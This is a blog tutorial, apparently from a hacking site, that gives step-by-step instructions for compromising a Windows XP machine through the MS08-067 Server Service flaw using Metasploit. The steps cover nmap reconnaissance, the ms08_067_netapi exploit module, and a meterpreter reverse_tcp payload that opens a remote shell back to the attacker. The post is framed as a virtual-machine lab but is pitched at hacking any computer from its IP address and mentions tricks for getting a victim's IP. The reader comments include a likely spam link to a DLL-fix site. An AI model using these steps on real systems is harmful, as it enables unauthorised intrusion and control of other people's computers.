[METASPLOIT TUTORIAL] Hacking Windows XP Using IP Address

metasploit_hack_windows xp_ip_picateshackz.com

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don’t believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me givemore details about this Server Service Vulnerability.
Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.
The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected.
A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
Exploiting the MS08-067 using Metasploit:
Step 1:

Create Two Virtual Machine(VM) namely “TARGET” and “KALI″.  Installthe XP inside Target VM and Kali Linux inside KALI. Start the Two VMs.
If you don’t know how to create virtual machines , then please read this VirtualBox Manual.
Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.
Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IPScanner.
Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.
Open The Terminal in the KALI machine(Kali Linux) and type “nmap -O“.  Here is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.

Step 4: Metasploit

Introduction to using Metasploit in Kali Linux

Now open the Terminal in the KALI machine(Kali Linux) and Type “msfconsole“.

The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Let us use the Search command to find the exploit modules with the keyword netapi. Type “search netapi”.  Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so typeuse exploit/windows/smb/ms08_067_netapi“.
Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Typeset payload windows/meterpreter/reverse_tcpin the msfconsole.
Step 6: Options
Typeset LHOST“.  Here is IP address of KALI machine.  You can find the ip address by typing ‘ifconfig’ command in the Terminal.
Type set RHOST“.  Here is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.

You may also like...

2 Responses

  1. Thanks for the post. You helped me. It has long been looking for solutions to this problem. Now I have still the problem was ISDone.dll. I can`t solve this error. Then I found a website that helped me. Here is a link to the website http://fix4dll.com/isdone_dll .

  2. Ali Khan says:

    Its really amazing and helped me a lot for my project